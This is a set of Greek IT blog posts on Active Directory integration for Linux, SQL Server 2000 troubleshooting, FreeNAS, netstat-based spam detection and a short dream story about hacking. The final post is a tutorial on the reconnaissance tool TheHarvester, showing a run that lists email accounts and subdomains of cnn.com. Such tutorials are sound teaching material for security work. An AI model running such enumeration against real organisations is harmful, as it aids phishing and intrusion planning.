    Αυτομάτως το μυαλό μου πήγε μερικά χρόνια πίσω στο Cybercrime Security Forum που είχε οργανώσει το autoexec.gr το 2008. Και τότε μου ήρθε…
    “Λες αυτές οι άκυρες φωτογραφίες να έχουν μέσα τους κάποιο μύνημα ή κάποιο κωδικό;”, ξεκίνησα τις διαδικασίες που μας είχαν δείξει τότε για την αποκρυπτωγράφηση ενός τέτοιου αρχείου. Το CD με τα προγράμματα το είχα πάντα κοντά μου και τα είχα ξαναδόκιμάσει, οπότε μου ήταν πιο εύκολο από ότι θα περίμενα.
    Ένα βήμα πριν από αυτό είχα καταφέρει και είχα τραβήξει σε ένα σημείο στο σύνεφο, ένα αρχείο που φαινόταν ‘κλειδί’. Ναι αυτό ήταν ο ‘keykeeper’. Ο keykeeper ήταν ένα αρχείο που δεν ήταν για φτιαγμένο για να τρέχει σε Windows, αλλά το βρήκα μέσα σε Windows σύστημα. Με αυτό το κλειδί στα χέρια έπεσα πάνω στα Images και έτσι έκανα και εκεί την διαδικασία και είχα ένα κωδικό ακόμα.
    Τον τελευταίο; Δεν ήξερα. Η ώρα είχε πάει 4 το πρωί και η αδρεναλίνη ήταν τέτοια που μου είχε φανεί λες και πέρασαν λίγα λεπτά. Φοβόμουν…φοβόμουν πολύ. Ήξερα ότι είχα κάνει ότι ξέρω για να κρυφτώ προς τον έξω κόσμο, αλλά αν κάποιος εκείνη την στιγμή ήταν στο traceback τότε ίσως να με έβρισκε και με την Μαφία δεν παίζεις. Μπαμ…και κάτω…
    Έψαξα και δεν έβρισκα τι να κάνω αυτό τον κωδικό. Πήγα πάλι σε εκείνο το site και ρώτησα… “που σε οδηγεί η εύρεση του κωδικού μετά τον keykeeper” και η απάντηση άμεση και σοκαριστική ίσως για μερικούς. “Είναι το κλειδί αποκρυπτογράφισης του συστήματος ασφαλείας των τηλεπικοινωνιών τους. Με αυτό κάποια πράγματα δεν θα φτάσουν ποτέ στον προορισμό τους. Αλλά για να το βρεις αυτό πρέπει να είσαι καλύτερος από τους IT Engineers που το έφτιαξαν”.
    Έμεινα άφωνος…και εκείνη την στιγμή χτυπάει το κινητό μου και ακούω σε αγγλικά με προφορά λατίνου. “You are dead amigo”!

    πετάχτηκα…κοίταξα τριγύρω…το κινητό μου δεν ήταν στα χέρια μου αλλά λίγο πιο δίπλα…ανακούφιση…με είχε πάρει ο ύπνος στο γραφείο, μπροστά στον υπολογιστή. Χαμογέλασα και ένιωσα χαζός…σήκωσα τα μάτια και κοίταξα την οθόνη και εκεί έγραφε…
    WARGAMES!

    Περισσότερες λεπτομέριες? click the image above
  13. Blackman
    Όσοι στο παρελθόν έχετε βάλει κάποιο linux σύστημα σε ένα εταιρικό δίκτυο, θα έχετε καταλάβει ότι υπάρχει μία δυσκολία στο να κάνετε το σύστημα σας authenticate στο Active Directory.
     
     
     
    Η απλή λύση είναι να δώσετε στο workgroup το όνομα του domain (όπως γίνεται και στις Home εκδόσεις των Windows) και μετά να δίνετε domain/username & password, όπου θέλετε να συνδεθείτε (εντός του domain και εφόσον έχετε εγκαταστήσει κάποιο πρόγραμμα που να προσφέρει file & printer sharing access).
     
     
     
    Η λύση αυτή δεν είναι η καλύτερη δυνατή και τελευταία οι εκδόσεις των διανομών Linux που βγαίνουν προσθέτουν την δυνατότητα να οριστεί και το domain, μέσω της επιλογής να χρησιμοποιεί το σύστημα Kerberos (αυτό δεν σημαίνει ότι σε κάνει authenticate), ενώ αρχικά είχαν προχωρήσει στην χρήση του LDAP για τον ίδιο λόγο.
     
     
     
    Ιστορικό

    Ο λόγος που τα πράγματα πήραν αυτή την τροπή, ήταν γιατί οι open source προγραμματιστές δεν είχαν στο μυαλό τους την χρήση ενός (και κοινού) συστήματος authentication, με αποτέλεσμα ο κάθε ένας να φτιάχνει ένα διαφορετικό authentication σύστημα. Με συνέπεια το θέμα να ξεφύγει από την δυνατότητα 'διαχείρισης'. Αρχίκα η λύση ήρθε από την SUN Microsystems που χρησιμοποίησε συγκεκριμένα APIs για authentication που ο κάθε developer μπορούσε να χρησιμοποιήσει. Για την ακρίβεια χρησιμοποίησε ένα μηχανισμό που λέγετε Pluggable Authentication Modules (PAM) και συνδύασαν αυτά τα APIs με τα Name Server Switch (NSS) APIs που χρησιμοποιούνται για την ανεύρεση των πληροφοριών του κάθε χρήστη.

    Η χρήση του LDAP μόνη της ή μαζί με Kerberos δεν δίνει τα επιθυμητά αποτελέσματα, καθότι στο μεν LDAP τα username & password περνάνε ως clear text μέσα από το δίκτυο (πράγμα μη αποδεκτό και ανασφαλές), ενώ με την χρήση του Kerberos τα πράγματα γίνονται μεν πιο ασφαλή, αλλά αγνοεί ότι γίνεται publish από το Active Directory που έχει σχέση με τις εγγραφές DNS Service Location, πράγμα που σημαίνει ότι ο linux χρήστης πρέπει να διαλέξει συγκεκριμένο set από DCs για να συνδεθεί.
     
     
    -----------------
     
    Η λύση έρχεται με την χρήση δύο εφαρμογών (μίας ουσιαστικά) που είναι διαθέσιμες σε όλες τις γνωστές και διαδεδομένες διανομές linux και είναι το SAMBA και το Winbind.
     
     
    Το SAMBA είναι ένα πρόγραμμα που συνδέει τα Linux συστήματα με τα συστήματα της Microsoft. Έχει συγκεκριμένα components που προσφέρουν Windows file & print services, όπως επίσης και linux-based services που συνεργάζονται με Windows DCs.
     
     
    Αυτό που μας ενδιαφέρει περισσότερο στο SAMBA είναι ένας δαίμονας (ή να λέω deamon;) με το όνομα Winbind. Αυτός ο δαίμονας δουλεύει σαν Proxy για την επικοινωνία των PAM & NSS (που αναφέραμε ποιο πάνω) του linux με το Active Directory ενός Domain Controller. Για την ακρίβεια χρησιμοποιεί το Kerberos για να κάνει το authentication με το AD και το LDAP για να πάρει όποια πληροφορία για χρήστες ή groups . Αυτό, θα σκεφτείτε, ότι ανέφερα ότι το κάνει ο συνδυασμός Kerberos & LDAP μέσα από το Linux έτσι και αλλιώς χωρίς την χρήση κάποιου δαίμονα. Όμως το Winbind, έρχεται να πάρει αυτό το κομμάτι και να του προσθέσει την δυνατότητα να βρίσκει όλους τους DCs (πράγμα που δεν κάνει ο απλός συνδυασμός Kerberos & LDAP) και το κάνει χρησιμοποιώντας ένα αλγόριθμο παρόμοιο με του DCLOCATOR που χρησιμοποιεί το AD, μαζί με την δυνατότητα να χρησιμοποιεί RPC και πλέον να μπορεί να κάνει reset Active Directory passwords (πράγμα που δεν γινόταν μέχρι την εμφάνιση του Winbind).
     
     
     
     

     
    ------------------
     
    Εγκατάσταση – Παραμετροποίηση
     
     
     
     

    http://www.wlug.org.nz/ActiveDirectorySamba
     

     

    http://docs.sun.com/app/docs/doc/819-3063/ciajejfa?a=view
     

     

    http://joseph.randomnetworks.com/archives/2005/11/08/freebsd-users-and-groups-with-samba-winbind-and-active-directory/
     

     

    https://help.ubuntu.com/community/ActiveDirectoryWinbindHowto
     

     

    http://www.linuxquestions.org/questions/linux-software-2/suse-9-winbind-samba-doc-153836/
     

     

    http://www.linuxquestions.org/questions/linux-networking-3/how-to-connect-fedora-6-to-existing-windows-2003-ad-527201/
     

    http://www.planetmy.com/blog/how-to-join-fedora-core-6-samba-server-to-windows-2003-active-directory/
     
    --------------------
     
    Winbind
     
    http://www.samba.org/samba/docs/man/Samba-HOWTO-Collection/winbind.html
     
     
    Εναλλακτικές λύσεις μπορείτε να βρείτε σε αυτό το ενδιαφέρον άρθρο
    http://www.securityfocus.com/infocus/1563
     
    ---------------------
     
    Ελπίζω να σας βοηθήσει!
     
  14. Blackman
    Όλοι ξέρουμε τον Microsoft SQL Server 2000.

     
    Οι περισσότεροι ξέρουμε το Business ERP της Singular Logic.

     
    Κάποιοι ξέρουμε και κάποιο Warehouse Management σύστημα.

     
     
    Θα σας διηγηθώ μέσω αυτού του άρθρου την διαδικασία εγκατάστασης ενός WMS συστήματος σε μία εταιρεία που δουλεύει με το Business ERP σε SQL 2000.
     
    Ας ξεκινήσουμε όμως με την απλή ερώτηση. Γιατί SQL server 2000 και όχι 2005 (ή 2008)? Πολύ απλά γιατί η εταιρεία έχει αγοράσει τον 2000 και δεν θέλει να διαθέσει λεφτά για αγορά του 2005 ή γιατί μας αρέσει καλύτερα ο 2000 (μας θυμίζει τα παλιά).
     
    Η επιλογή του ERP στο συγκεκριμένο άρθρο έχει γίνει λόγω ότι το πρόβλημα που θα περιγράψω μεταξύ αυτών των τριών συστημάτων είναι και αυτό που έζησα.
     
    Αρχική Κατάσταση
     
    SQL server 2000 (χωρίς Service Pack) εγκατεστημένο σε Windows 2003 server. (database server)
    Οι βάσεις του Business ERP βρίσκονται σε αυτόν τον server, ενώ το application κομμάτι βρίσκετε σε άλλο server.
    Με αυτό το configuration τα πάντα δουλεύουν κανονικά και χωρίς πρόβλημα.
     
    Παρατηρήσεις: Εγκατάσταση του SP δεν είχε γίνει καθότι στις θεωρούμενες μεγάλες εγκαταστάσεις του Business ERP ο SQL 2000 βγάζει προβλήματα αν έχει εγκατεστημένο SP (το SP4 συγκεκριμένα). Το βασικό πρόβλημα είναι ότι κολλάει και δεν κάνει commit κάποια transactions, οπότε και όλο το σύστημα του ERP μέσα στην εταιρεία κολλάει αντίστοιχα. Το παραπάνω είναι επιβεβαιωμένο σε αρκετές εγκαταστάσεις με βάση το feedback που υπάρχει από εξωτερικούς συνεργάτες της Singular Logic.

    Στόχος

    Εγκατάσταση-προσάρτηση WMS συστήματος που συνδέεται με το ERP και χρησιμοποιεί φορητά τερματικά (pdas) για το scanning των barcodes των ειδών της αποθήκης.
     
    Βήματα που ακολουθήθηκαν
     
    Εγκατάσταση του WMS συστήματος σε ένα ξεχωριστό server με εγκατεστημένο τον IIS για να μπορεί να δουλεύει το management κομμάτι της εφαρμογής που γίνετε μέσω browser. Η WMS εφαρμογή είναι γραμμένη σε .NET.
    Παραμετροποίηση του σχετικού config αρχείου για να βλέπει τον database server.
    Δοκιμή της σύνδεσης που ακολουθείται με αποτυχία αυτής.
     
    Μετά από πολλές δοκιμές παρατηρείτε το ότι δεν υπάρχει σύνδεση με τον server σε κανένα επίπεδο. Ούτε με telnet, το οποίο δεν γίνετε ΟΥΤΕ τοπικά.
    Σκέψη; Εγκατάσταση του Service Pack 4 (πρόταση της εταιρείας με το WMS, σκέψη δική μας η εγκατάσταση του επόμενου διαθέσιμου SP). Αξίζει να σημειωθεί ότι στις ρυθμίσεις του SQL 2000 υπάρχουν δύο πρωτόκολλα επικοινωνίας, το TCP/IP και το named pipes. Με βάση την συγκεκριμένη εγκατάσταση ανακαλύψαμε ότι η εφαρμογή της Singular Logic χρησιμοποιεί κατά κύριο λόγο named pipes, το οποίο το βλέπεις απλά απομακρύνοντας το TCP/IP πρωτόκολλο, όπου η εφαρμογή και πάλι δούλευε, εν αντιθέσει όταν έγινε το αντίστροφο το ERP σταμάτησε να δουλεύει. (εφαρμογή developed 10+ χρόνια πριν)
     
    Μετά από Backup των βάσεων και detach όλων αυτών, γίνεται απεγκατάσταση του SQL 2000 και ξανά εγκατάσταση αυτού ώστε να έχουμε μία 'καθαρή' εγκατάσταση. Στην συνέχεια γίνεται εγκατάσταση του SP4, attach πάλι όλες τις βάσεις και δοκιμές. Όλα παίζουν κανονικά, ακόμα και το telnet.
     
    Συμπέρασμα 1: Σε εγκατάσταση Microsoft SQL Server 2000 χωρίς service packs εγκατεστημένα σε Windows 2003 server, το σύστημα δεν συμπεριφέρεται ορθά. Το ίδιο σενάριο το επιβεβαίωσα και σε Virtual Lab, όπου έχουμε Ping, έχουμε name resolution, δεν έχουμε telnet, δεν έχουμε connection από IIS, δεν έχουμε connection από Windows CE. Με την εγκατάσταση του SP4, η συμπεριφορά έρχεται στα σωστά επίπεδα, όπου όλοι οι τρόποι δοκιμών και επικοινωνίας επιτυγχάνουν.
    ΠΑΡΑΤΗΡΗΣΗ: Κατά την εγκατάσταση του SQL 2000 βγάζει ένα μήνυμα που σε προειδοποιεί ότι για να δουλέψει σωστά θέλει εγκατάσταση από SP3 και άνω. Οπότε καταλαβαίνετε ότι αυτά που αναφέρω, η Microsoft τα γνωρίζει ήδη.
     
    Επόμενο βήμα
    Μετά από όλες τις δοκιμές επικοινωνίας και κάποιων tests στα τερματικά, ξεκίνησε η κανονική λειτουργία του συστήματος WMS μαζί με το ERP και τα PDAs.
    Όλα δούλευαν κανονικά, καθώς η όλη διαδικασία εγίνε Σαββατοκύριακο. Προβλήματα υπήρχαν κάθε τόσο στα pdas που έχαναν τη σύνδεση με το web κομμάτι και διορθωνόταν το πρόβλημα με επανεκκίνηση. Το πρόβλημα που αναφερόταν είχε να κάνει με τα connections στον IIS. Λύση για το συγκεκριμένο ήταν να πάμε στο config αρχείο και να δηλώσουμε να αφήνει όλα τα connections (κακό για το performance) ώστε να γλυτώσουμε χρόνο.
     
    Επόμενο πρόβλημα; Μετά από 3 μέρες συνεχής δουλειάς ένα μήνυμα λάθους πάλι εμφανίστηκε και τα pdas έχασαν επικοινωνία με την βάση. Ούτε με επανεκκινήσεις δούλευε το σύστημα, αλλά μόνο με το να πας πάλι στα πρωτόκολλα επικοινωνίας του SQL 2000 και να αλλάξεις την προτεραιότητα τους και να βάλεις πρώτο το TCP/IP και αποτσεκάρεις το "Force protocol encryption" (αυτό μετά από 3 ημέρες δουλειάς και άλλες 2 ημέρες δοκιμών).
     

     
    Ένα ακόμα λάθος στο σύστημα του WMS λύθηκε με εγκατάσταση ενός νέου IIS πάνω στον SQL server και παραμετροποίηση όλων για να δουλέψει αυτή η αλλαγή.
     
    Στην συνέχεια όλα δουλεύουν κανονικά.
    Όλα; Κάποιες ημέρες μετά το ERP δεν ξεκινάει στους χρήστες. Μετά από έλεγχο παρατηρείται ότι ο διαθέσιμος χώρος στον δίσκο που βρίσκονται οι βάσεις και συγκεκριμένα το log file έχει γεμίσει. Επόμενη παρατήρηση είναι ότι το μέγεθος του Log file της μίας βάσης έχει ξεπεράσει σε μέγεθος την ίδια την βάση. Detach την βάση, σβήσιμο του Log file και ξανά attach με καθαρό log file. Όλα δουλεύουν καλά μέχρι την επόμενη μέρα που το μέγεθος πάλι μεγαλώνει δραματικά και οι καθυστερήσεις στο σύστημα γίνονται καθημερινότητα. Διάφορες δοκιμές μας έδιχναν ποιο είναι το πρόβλημα και το ποιο ουσιαστικό ήταν ότι η βάση δεν μπορούσε να γίνει reindex καθώς όλα τα scheduled jobs απέτυχαν.
     
    Η διαδικασία γνωστή...
    backup τις βάσεις, detach τις βάσεις, uninstall όλου του SQL 2000 μαζί με το SP4, επανεγκατάσταση του SQL 2000 και εγκατάσταση του SP3a.
    Ξανά attach τις βάσεις και όλα τα γνωστά.
    Έκτοτε τα προβλήματα εξαφανίστηκαν.

    Σε αναζήτηση στο Internet θα βρείτε ότι το SP4 έχει πάρα πολλά προβλήματα, σε διάφορες εγκαταστάσεις.
     
    Συμπέρασμα 2: Το Business ERP σε Sql server 2000 παίζει σωστά με Service Pack 3a, σε συνδυασμό με το WMS.

    -------------------
     
    Συνοψίζοντας την παραπάνω ιστορία και ανάλυση και έχοντας μεταφέρει την γνώση αυτή και σε άλλο ένα συνάδελφο που αντιμετώπισε τα ίδια προβλήματα και είδαμε ότι τα προβλήματα του λύθηκαν, θα σημειώσω τις βασικές παρατηρήσεις.
     

    SQL server 2000 σε Windows 2003 server θέλει εγκατάσταση SP (το λέει και η Microsoft) Μακριά από το SP4
    Business ERP και SQL server 2000 θέλει MONO SP3a To SP3a δεν δημιουργεί πρόβλημα ούτε στο σύστημα WMS Μετά την εγκατάσταση του SP3a ελέγξτε τα πρωτόκολλα, ώστε να έχει σαν πρώτο το TCP/IP (και αποτσεκάρετε το force protocoll encryption)
    - Σε περίπτωση προβλημάτων με τα connections σε IIS (η λύση του unlimited connections που εφαρμόσαμε ΔΕΝ ΠΡΟΤΙΝΕΤΑΙ) 
    --------------------
    Δεν ξέρω κατά πόσο θα βοηθήσει κάποιον, αλλά όπως προανέφερα την γνώση αυτή την μοιράστηκα ήδη με ένα συνάδελφο που γλύτωσε πάρα πολύ χρόνο.
    Στην Ελλάδα του σήμερα εγκαταστάσεις Business ERP σε SQL 2000 είναι αρκετές, αλλά και γενικά εγκαταστάσεις SQL 2000 υπάρχουν σε εταιρείες, καλο είναι να έχουμε τα παραπάνω ως βοηθό ή μπούσουλα για την αποφυγή πονοκεφάλων.
     
  15. Blackman
    Ένα σύστημα φτιαγμένο για να κάνει αυτό που λέει.

    Να μετατρέπει ένα οποιοδήποτε σύστημα με ίδιους δίσκους επάνω και χωρίς την χρήση κάποιου controller, παρά μόνο του συγκεκριμένου συστήματος, σε Network-attached Storage.

    Παρακάτω μπορείτε να δείτε μία παρουσίαση (screencast) του συγκεκριμένου συστήματος σε εικονικό περιβάλλον και σε χρήση με το host μηχάνημα που είναι σε Windows Vista Ultimate 64bit. Η συγκεκριμένη linux λύση λειτουργεί απροβλημάτιστα σε οποιοδήποτε τύπου δικτύου μπει, είτε αυτό είναι ένα workgroup ή domain Microsoft, είτε linux ή κάποιο mixed mode.

    ΚΑΤΕΒΑΣΤΕ ΤΟ ΒΙΝΤΕΟ (διάρκειας 22 λεπτών)

    ΔΕΙΤΕ ΤΟ ONLINE

    Θα σας το σύστηνα ανεπιφύλακτα να το βάλετε στο σπίτι ή στην δουλειά, μετατρέποντας ένα παλιό PC σε NAS με κόστος μόνο τους δίσκους (ίσως και κάποια έξτρα κάρτα δικτύου). Φυσικά δεν πρόκειται να αντικαταστήσει επαγγελματικές λύσεις, αλλά σίγουρα είναι μία πολύ ωραία εναλλακτική για backup σύστημα.

     

    Η σελίδα του συστήματος είναι η http://www.freenas.org/

    και το σύστημα μπορείται να το κατεβάσετε από ΕΔΩ (διαλέξτε μεταξύ Live CD - Standard Image - VMware Image).

    Υ.Γ. Συγχωρέστε με για όποια λάθη. Η παρουσίαση έγινε στις 1 το πρωί.

    Ελπίζω να σας αρέσει
  16. Blackman
    Είσαι στο γραφείο σου και θαυμάζεις τα γραφόμενα του Κλαδάκη στο autoexec.gr ...

    ξαφνικά "σκάει" τηλέφωνο από τον οικονομικό διευθυντή και σου λέει (αρχικά) "το Internet αργεί"...

    σούζα το αλογάκι...και ξεκινάς το ψάξιμο... και ναι βρίσκεις ότι το Ping Με τον έξω κόσμο είναι μεγάλο και σαν πρώτη κίνηση ρίχνεις ένα restart στο router μήπως κάτι έχει κολλήσει...μήπως ο νέος πωλητής της εταιρείας κατεβάζει μεγάλα 'εκπαιδευτικά' αρχεία, ενώ ο παλιός πωλητής της εταιρείας παίζει τάβλι στο Internet και κατεβάζει torrent. (όχι στην δική μου εταιρεία αυτά έχουν φάει 'πόρτα', όπως και ότι άλλο σχετικό).

    Βλέπεις ότι τα πράγματα στρώνουν και ενημέρωνεις ανάλλογα.

    Όμως σε τρώει η αγωνία, γιατί παρατηρείς περίεργα πράγματα. Κάνεις μία στην κεντρική κονσόλα του antivirus για να δεις τα σχετικά reports. Βλέπεις ότι όντως τις τελευταίες ημέρες κάτι έχει βρει και το έχει σβήσει ή το έχει βάλει σε γκαραντίνα. Παρατηρείς επίσης ότι ο συγκεκριμένος υπολογιστής έχει δικαιώματα administrator (κακό αυτό), αλλά τα έχει για συγκεκριμένους λόγους. Είτε φταις εσύ που το έχεις επιτρέψει, είτε φταίει ο προκάτοχος σου, αυτό πρέπει να αλλάξει.

    Παρόλα αυτά αποφασίζεις να σκανάρεις πάλι τα σχετικά μηχανήματα (μαζί με κάποια άλλα που θεωρείς επίφοβα) και τα βρίσκεις όλα εντάξει.

    Ξαναπαίρνεις την φραπεδούμπα και την αράζεις για να συνεχίσεις την δουλειά σου. Οι ημέρες περνάνε και ξαφνικά έρχονται τα πρώτα NDRs από emails που στέλνουν οι υπόλοιποι συνάδελφοι και παρατηρείς ότι αναφέρει ότι η IP της εταιρείας έχει γίνει block από σχετικές λίστες spam στο internet (βλ. Spamhaus, spamcop κλπ). Σε πρώτη φάση μπαίνεις στις σχετικές σελίδες και κάνεις delist και όλα ΟΚ. Μετά από κάποιες ώρες πάλι τα ίδια...

    Ξεκινάς τα πρώτα γαλλικά... μπαίνεις στην σελίδα http://multirbl.valli.org/ και στο http://www.mxtoolbox.com και βλέπεις τι παίζει.

    Αφού έχεις ελέγξει ότι πλέον δεν υπάρχει ιός, αν ξέρεις ελέγχεις το router σου για τα smtp connections που έχει ή παίρνεις τηλ αυτόν που στο διαχειρίζεται για να δει. Συνήθως αυτός βαριέται που ζει και δεν σε βοηθάει...

    Πλέον ξέρεις ότι από κάποιο PC φεύγουν spam και δεν χρησιμοποιούν τον exchange σου για αυτό. Πως μπορείς να βεβαιωθείς ότι κάτι πάει στραβά και να βγάλεις το σχετικό PC εκτός;

    Ναι...μετά από αυτόν τον πρόλογο καταλήγουμε στο netstat.exe

    Πας στον ή στους υπολογιστές που νομίζεις ότι έχει το πρόβλημα και το antivirus το βγάζουν καθαρό και εκτελείς ένα netstat -a

    με τον υπολογιστή χωρίς τίποτα ανοιχτό (πχ Outlook, Internet Explorer κλπ) και παίρνεις τα αποτελέσματα σου

    όπως πήρα πχ από ένα laptop εγώ



    την συνέχεια την φανταζόσαστε.

     

    Οι περισσότεροι φαντάζομαι ότι γνωρίζετε την χρήση του Netstat και φυσικά πολλά μπορούν να συζητηθούν για το πως μπορείς να αποφύγεις μία κατάσταση σαν την παραπάνω. Το θέμα όμως δεν είναι αυτό, αλλά τι μπορεί να βρει κάποιος από μία απλή εντολή.

    Πάρτε και κάποια σχετικά Links

    για Windows

    http://www.ehow.com/how_2212398_use-netstat-commands.html



    http://commandwindows.com/netstat.htm

    για Linux

    http://linuxpoison.blogspot.com/2008/07/how-to-use-netstat.html

    http://www.linuxhowtos.org/Network/netstat.htm

    http://www.faqs.org/docs/linux_network/x-087-2-iface.netstat.html
  17. Blackman
    Από αυτό εδώ το Blog έχω αναφέρει στο παρελθόν την δυνατότητα του να κάνουμε ένα linux μηχάνημα join σε ένα domain ή ακόμα και να στήσουμε domain έχοντας ως DC ένα linux server. Η πραγματικότητα όμως είναι λίγο διαφορετική, καθότι το πιο πιθανόν (σε υλοποίηση με linux server) που μπορεί να αντιμετωπίσουμε είναι ένα Microsoft domain, με κάποιον άλλο linux server (πιθανότατα email server ή κάποιος application server ή database server MySQL) να υπάρχει στο δίκτυο. Οι πιθανότητες να μην είναι έτσι είναι λίγες.

    Φυσικά, υπάρχουν και περιπτώσεις που εμείς οι διαχειριστές ενός δικτύου, θέλουμε να βάλουμε ένα μηχάνημα Linux ή Mac στο δίκτυο μας, είτε για δοκιμές, είτε για να διευρύνουμε τις δυνατότητες που μας δίνονται. Σε περιπτώσεις εταιρειών που χρησιμοποιούν κατά κόρον Mac λόγο σχεδιαστικών και λοιπών προγραμμάτων σίγουρα υπάρχει ένα θέμα όσον αφορά τις λύσεις που υπάρχουν για να μπουν αυτά τα μηχανήματα στο domain, αλλά και να μπορεί κάποιος να εφαρμόσει κάποιες πολιτικές. Σε επίπεδο Mac ο φίλτατος costasppc προφανώς έχει περισσότερες γνώσεις, οπότε ότι αναφέρω σε αυτό το άρθρο ίσως να ξέρει και άλλες εναλλακτικές.

    Το θέμα μας, σε αυτή την περίπτωση είναι απλό. Έχω βάλει ή θέλω να βάλω κάποια linux μηχανάκια στο δίκτυο μου και ακόμα ένα δύο Mac, αλλά παρόλο που έχω την δυνατότητα να τα κάνω join στο Domain, δεν θέλω να μπορούν να κάνουν ότι να ναι, αλλά να μπορώ να στείλω κάποιες πολιτικές δικτύου, ώστε να μου κάνουν την ζωή ποιο εύκολη. Αν το ψάξετε στο Internet, θα δείτε ότι υπάρχουν λύσεις για αυτό το πρόβλημα.

     

    Μία τέτοια λύση είναι και η λύση της Likewise. Η συγκεκριμένη εταιρεία δίνει την δυνατότητα να κατεβάσετε τον Likewise Group Policy Agent ο οποίος με την σειρά του κάνοντας τον εγκατάσταση στο σύστημα σας ουσιαστικά διευρύνει τις επιλογές της MMC group policy κονσόλας, προσθέτοντας επιλογές που έχουν να κάνουν με Linux ή Mac. Αντίστοιχα ο ίδιος ο Agent τρέχει και στα μηχανήματα που θέλουμε ώστε να γίνουν apply αυτές οι πολιτικές.

    Έτσι μέσα σε όλα έχουμε την δυνατότητα να εκτελέσουμε κάποια πολιτική με την χρήση sudo (superuser do) και ουσιαστικά με αυτό τον τρόπο να ελέγχουμε πλήρως τα linux λειτουργικά. Αλλά δεν είναι μόνο αυτά... Ως γνωστόν, τα linux distributions είναι αρκετά και το καλό του συγκεκριμένου είναι ότι μας γίνει και την δυνατότητα να επιλέξουμε για ποιο distro αναφέρετε η συγκεκριμένη πολιτική.



    Με αυτό το εργαλείο λοιπον, μπορεί ο οποιοσδήποτε να διαχειριστεί ένα Mixed περιβάλλον, όπως θα έκανε και με ένα καθαρά Microsoft. Δυστυχώς το παραπάνω δεν είναι δωρεάν αλλά πρέπει να το αγοράσετε, αλλά υπάρχει η δυνατότητα να το κατεβάσετε σαν demo για να δείτε τι ακριβώς κάνει.

    Ενδιαφέροντα links για να δείτε είναι τα εξής:

    How to Create and Test a Sudo Policy for Linux and Unix

    Active Directory Group Policy for Unix

     

    Αντίστοιχες λύσεις με τη παραπάνω υπάρχουν φυσικά και παρακάτω είναι κάποιες από αυτές:

    Centrify DirectControl

    Vintela Group Policy

     

    Το συγκεκριμένο δεν είναι κάποια καινούρια τεχνολογία, αλλά υφίσταται τα τελευταία χρόνια. Η αλλαγή στάσης της Microsoft απέναντι στα Open Source λογισμικά, επέτρεψε και σε εργαλεία όπως τα παραπάνω να γίνουν ακόμα περισσότερο λειτουργικά και με λιγότερες επιπλοκές στην χρήση τους. Interoperability...made easy...
  18. Blackman
    Επόμενο μάθημα στα εργαλεία του Back|Track 4 έχουν να κάνουμε ένα εργαλείο που ονομάζετε The Harvester. Σκοπός του είναι να συλλέξει πληροφορίες όπως λογαριασμοί email, username και hostnames ή subdomains από διάφορες πηγές.
    Οι πηγές αυτές είναι οι παρακάτω:
    Google – emails,subdomains/hostnames Bing search – emails, subdomains/hostnames Pgp servers – emails, subdomains/hostnames Linkedin – usernames MSN.com – emails, subdomains/hostnames (1.4) Τρέχοντας το πρόγραμμα βλέπουμε το παρακάτω (το printscreen είναι από την PreFinal έκδοση (1.4b έκδοση του TheHarvester) για αυτό δεν βλέπετε στα data source το Bing. Στην νεότερη έκδοση (1.6) έχει προστεθεί, ενώ έχει αφαιρεθεί το MSN – προφανώς λόγο αντικατάστασης με το bing)

    Στην τελική έκδοση πρέπει να βλέπεται το παρακάτω στο usage:
    10
    Usage: theharvester options
    11


    12
    -d: domain to search or company name
    13
    -b: data source (google,bing,pgp,linkedin)

    14
    -s: start in result number X (default 0)
    15
    -v: verify host name via dns resolution

    16
    -l: limit the number of results to work with(bing goes from 50 to 50 results,
    17
    google 100 to 100, and pgp does'nt use this option)
    Όπως μπορείτε να δείτε, η χρήση του είναι εύκολη. Αλλά ας δούμε μία δοκιμή με το cnn.com
    01
    root@bt:/pentest/enumeration/google/theharvester# ./theHarvester.py -d cnn.com -l 500 -b bing
    02
    03
    *************************************
    04
    *TheHarvester Ver. 1.6 *
    05
    *Coded by Christian Martorella *
    06
    *Edge-Security Research *
    07
    *[email protected] *
    08
    *************************************
    09
    10
    Searching for cnn.com in bing :
    11
    ======================================
    12
    13
    Limit: 500
    14
    Searching results: 0
    15
    Searching results: 50
    16
    Searching results: 100
    17
    Searching results: 150
    18
    Searching results: 200
    19
    Searching results: 250
    20
    Searching results: 300
    21
    Searching results: 350
    22
    Searching results: 400
    23
    Searching results: 450
    24
    25
    Accounts found:
    26
    ====================
    27
    28
    @cnn.com
    29
    [email protected]
    30
    ====================
    31
    32
    Total results: 2
    33
    34
    Hosts found:
    35
    ====================
    36
    37
    www.cnn.com
    38
    edition.cnn.com
    39
    money.cnn.com
    40
    sportsillustrated.cnn.com
    41
    amfix.blogs.cnn.com
    42
    live.cnn.com
    43
    news.blogs.cnn.com
    44
    politicalticker.blogs.cnn.com
    45
    marquee.blogs.cnn.com
    46
    weather.cnn.com
    47
    m.cnn.com
    48
    transcripts.cnn.com
    49
    www.cnnstudentnews.cnn.com
    50
    ac360.blogs.cnn.com
    51
    campbellbrown.blogs.cnn.com
    52
    newsource.cnn.com
    53
    cgi.cnn.com
    54
    joybehar.blogs.cnn.com
    55
    topics.edition.cnn.com
    56
    internationaldesk.blogs.cnn.com
    57
    us.cnn.com
    58
    larrykinglive.blogs.cnn.com
    59
    topics.cnn.com
    60
    weather.edition.cnn.com
    61
    cnnwire.blogs.cnn.com
    62
    scitech.blogs.cnn.com
    63
    on.cnn.com
    64
    ricksanchez.blogs.cnn.com
    65
    archives.cnn.com
    66
    community.cnn.com
    67
    sports.si.cnn.com
    68
    arabic.cnn.com
    69
    quiz.cnn.com
    70
    newsroom.blogs.cnn.com
    71
    cgi.money.cnn.com
    72
    partners.cnn.com
    73
    pagingdrgupta.blogs.cnn.com
    74
    features.blogs.fortune.cnn.com
    75
    tech.fortune.cnn.com
    76
    insession.blogs.cnn.com
    77
    business.blogs.cnn.com
    78
    behindthescenes.blogs.cnn.com
    79
    olympics.blogs.cnn.com
    80
    afghanistan.blogs.cnn.com
    81
    gdyn.cnn.com
    82
    premium.cnn.com
    83
    inthefield.blogs.cnn.com
    84
    ypwr.blogs.cnn.com
    85
    premium.edition.cnn.com
    86
    edition1.cnn.com
    87
    drgupta.cnn.com
    88
    edition2.cnn.com
    89
    wallstreet.blogs.fortune.cnn.com
    90
    tips.blogs.cnn.com
    91
    mxp.blogs.cnn.com
